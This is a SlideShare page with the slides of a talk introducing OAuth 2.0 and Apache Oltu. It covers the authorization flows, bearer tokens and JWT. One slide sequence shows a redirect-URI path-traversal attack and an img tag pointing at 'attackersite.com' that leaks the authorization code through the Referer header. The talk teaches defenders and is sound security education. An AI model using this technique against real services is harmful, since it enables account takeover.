SlideShare une entreprise Scribd logo

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

Antonio Sanso
Antonio Sanso

JUG Basel

Internet
1  sur  42
Télécharger pour lire hors ligne
OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
My (little) contribution to OAuth Not an RFC, still in the draft phase
Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
A bit of history – OAuth 1.0a
A bit of history – OAuth 2.0 2 years X
The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
How difficult is to implement OAuth ? OAuth client OAuth server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
Bearer Token Authorization: Bearer 1017097752d5f18f716cc90ac8 a5e4c2a9ace6b9
Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
JSON Web Token eyJhbGciOiJIUzI1NiIs InR5cCI6IkpXVCJ9. eyJhdWQiOiJjb25uZ WN0MjAxNCIsImlzcy I6ImFzYW5zbyIsInN 1YiI6ImFzYW5zbyIsI mV4cCI6MTQwMzY wMTU1OSwiaWF0Ijo xNDAzNjAxNTU5fQ. MaGUiPg07ezuP9yA OaVLETQH6HMOpfo Gwg_c0-PDw {"alg":"HS256","typ":"JWT"} {"aud": "jug2015","iss":  "oltu","sub":"asanso","exp": 1403601559,"iat":1403601559} HMAC Header Claims Signature ★
JSON Web Token
OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/
Questions?

Recommandé

Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Alvaro Sanchez-Mariscal
 
OAuth for your API - The Big Picture
OAuth for your API - The Big PictureOAuth for your API - The Big Picture
OAuth for your API - The Big PictureApigee | Google Cloud
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuthleahculver
 
OAuth using PHP5
OAuth using PHP5OAuth using PHP5
OAuth using PHP5Nurulazrad Murad
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 AuthenticationIsmael Costa
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2Aaron Parecki
 

Recommandé

Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Alvaro Sanchez-Mariscal
 
Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Stateless authentication for microservices - Greach 2015
Stateless authentication for microservices - Greach 2015Alvaro Sanchez-Mariscal
 
OAuth for your API - The Big Picture
OAuth for your API - The Big PictureOAuth for your API - The Big Picture
OAuth for your API - The Big PictureApigee | Google Cloud
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Implementing OAuth
Implementing OAuthImplementing OAuth
Implementing OAuthleahculver
 
OAuth using PHP5
OAuth using PHP5OAuth using PHP5
OAuth using PHP5Nurulazrad Murad
 
OAuth2 Authentication
OAuth2 AuthenticationOAuth2 Authentication
OAuth2 AuthenticationIsmael Costa
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2Aaron Parecki
 
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHPDavid Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectJonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHPLorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinJava User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservicesAlvaro Sanchez-Mariscal
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0Uwe Friedrichsen
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSHüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST securityIgor Bossenko
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsJon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0Karl McGuinness
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 PresentationMohamed Ahmed Abdullah
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018Matt Raible
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician Antonio Sanso
 

Contenu connexe

Tendances

Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Alvaro Sanchez-Mariscal
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHPDavid Ingram
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectJonathan LeBlanc
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHPLorna Mitchell
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinJava User Group Latvia
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication Micron Technology
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservicesAlvaro Sanchez-Mariscal
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSHüseyin BABAL
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST securityIgor Bossenko
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsJon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018Matt Raible
 

Tendances (20)

Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
 
Using OAuth with PHP
Using OAuth with PHPUsing OAuth with PHP
Using OAuth with PHP
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
 
Implementing OAuth with PHP
Implementing OAuth with PHPImplementing OAuth with PHP
Implementing OAuth with PHP
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
 
Stateless authentication for microservices
Stateless authentication for microservicesStateless authentication for microservices
Stateless authentication for microservices
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015Stateless authentication for microservices - Spring I/O 2015
Stateless authentication for microservices - Spring I/O 2015
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
REST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
 

En vedette

JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician Antonio Sanso
 
Gramática - Termos Integrantes
Gramática - Termos IntegrantesGramática - Termos Integrantes
Gramática - Termos IntegrantesMentor Concursos
 
TDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com StreamTDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com Streamtdc-globalcode
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Hermann Burgmeier
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RSFrank Kim
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - IntroductionKnoldus Inc.
 
OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디Jua Alice Kim
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and AuthorizationConFoo
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2Rodrigo Cândido da Silva
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsSelene G. Parekh, MD, MBA
 
An Introduction to OAuth 2
An Introduction to OAuth 2An Introduction to OAuth 2
An Introduction to OAuth 2Aaron Parecki
 
Intro to Amazon S3
Intro to Amazon S3Intro to Amazon S3
Intro to Amazon S3Yu Lun Teo
 
C# OOP Advanced Concepts
C# OOP Advanced ConceptsC# OOP Advanced Concepts
C# OOP Advanced Conceptsagni_agbc
 

En vedette (20)

JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
 
Gramática - Termos Integrantes
Gramática - Termos IntegrantesGramática - Termos Integrantes
Gramática - Termos Integrantes
 
TDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com StreamTDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com Stream
 
Top X OAuth 2 Hacks
Top X OAuth 2 HacksTop X OAuth 2 Hacks
Top X OAuth 2 Hacks
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
 
Cqcon
CqconCqcon
Cqcon
 
OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and Authorization
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2
 
Speeding Up Innovation
Speeding Up InnovationSpeeding Up Innovation
Speeding Up Innovation
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tears
 
An Introduction to OAuth 2
An Introduction to OAuth 2An Introduction to OAuth 2
An Introduction to OAuth 2
 
Intro to Amazon S3
Intro to Amazon S3Intro to Amazon S3
Intro to Amazon S3
 
C# OOP Advanced Concepts
C# OOP Advanced ConceptsC# OOP Advanced Concepts
C# OOP Advanced Concepts
 
Amazon S3 Masterclass
Amazon S3 MasterclassAmazon S3 Masterclass
Amazon S3 Masterclass
 

Similaire à OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itBastian Hofmann
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbedleahculver
 
OAuth con doorkeeper
OAuth con doorkeeperOAuth con doorkeeper
OAuth con doorkeeperSergio Marin
 
Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Johnny Sung
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)Joel Lord
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuththariyarox
 
Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015Alvaro Sanchez-Mariscal
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIsrandyhoyt
 
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityChrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityYu-Shuan Hsieh
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)Joel Lord
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIsrandyhoyt
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuthVivastream
 
O auth how_to
O auth how_toO auth how_to
O auth how_tovivaqa
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at WebvisionsAaron Parecki
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security Joel Lord
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Adam Lewis
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2Aaron Parecki
 

Similaire à OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu (20)

The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve it
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbed
 
OAuth con doorkeeper
OAuth con doorkeeperOAuth con doorkeeper
OAuth con doorkeeper
 
Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuth
 
Stateless authentication for microservices applications - JavaLand 2015
